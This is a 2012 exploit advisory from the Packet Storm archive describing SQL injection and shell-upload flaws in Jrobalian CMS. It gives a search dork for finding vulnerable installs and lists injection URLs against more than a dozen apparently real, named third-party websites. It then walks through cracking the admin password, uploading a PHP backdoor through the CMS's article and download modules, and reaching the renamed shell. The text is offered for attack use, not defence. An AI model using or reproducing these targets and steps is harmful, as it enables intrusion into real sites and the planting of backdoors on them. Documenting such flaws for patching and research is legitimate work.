what you don't know can hurt you

Jrobalian CMS SQL Injection

Jrobalian CMS SQL Injection
Posted Jul 22, 2012
Authored by X-Cisadane

Jrobalian CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 911b5bd346c7ae0950ffbcdb93469665

Jrobalian CMS SQL Injection

Change Mirror Download
=====================================================
Jrobalian CMS SQL Injection Vulnerability
=====================================================
 
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Jrobalian CMS SQL Injection Vulnerability
: # Date : 21 July 2012
: # Author : X-Cisadane
: # Software Link : http://www.jrobalian.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & Upload Shell Vulnerability
: # Tested On : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
inurl:i.php?mid=


Proof of Concept
================
1.SQL Injection (With Error Notice & Without Error Notice)
SITE TARGET.com/content/i.php?mid=[SQLi]
OR
SITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi]
Example :
http://www.daikinaircon.co.id/content/i.php?mid=4&id=41'
http://www.investors-academy.co.id/content/i.php?mid=3&id=7'
http://www.pdpersi.co.id/content/i.php?mid=3&id=112'
http://www.indosuksesfutures.com/content/i.php?mid=3&id=81'
http://www.shop4mattress.com/content/i.php?mid=69'

Others :
SITE TARGET.com/content/news.php?catid=[SQLi]
Example :
http://www.indosuksesfutures.com/content/news.php?catid=1'&?mid=6&id=20
http://www.idijakbar.com/content/news.php?catid=1'
http://www.contohwebsite.com/content/news.php?catid=1'&mid=4&id=24
http://www.quadras.co.id/content/news.php?show=comment&id=11'
http://www.contohwebsite.com/content/pd_events.php?mid=4&id=&catid=1'&show=archive
http://www.daikinaircon.co.id/content/products.php?plid=1&mid=2&id=21'
http://www.daikinaircon.co.id/content/projects.php?mid=3&ptid=13'
http://www.daikinaircon.co.id/content/gallery.php?&mid=13&id=17'
http://www.daikinaircon.co.id/content/downloads.php?&mid=5&id=28'
http://www.daikinaircon.co.id/content/faqs.php?&mid=5&id=29'
http://www.daikinaircon.co.id/content/training.php?&mid=5&id=30'
Explore more your self...

Tested With Havij - Advanced SQL Injection Tool Version 1.15 Free

2.Upload Shell (Must login with admin privilege)
If the force with you (you've successfully cracked the password) 0:) you can login with Admin privilege into CMS.

Admin login page :
SITE TARGET.com/admin/
or
SITE TARGET.com/content/admin/
Example : http://www.shop4mattress.com/admin/

Then Upload Shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles.
Insert an ATTACHMENT (your .php Backdoor)
Then check Published to yes, and click SAVE!
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php'

OR you can upload PHP Shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads.
Insert Title, Description, Insert your PHP Backdoor (browse)
Then click SAVE!
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php'
Then Click Button 'Unduh' (Download), After that your browser will shown a pop-up to download a file, example : file21_ba.php <--- Your PHP Backdoor which automatically renamed by the CMS.
You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close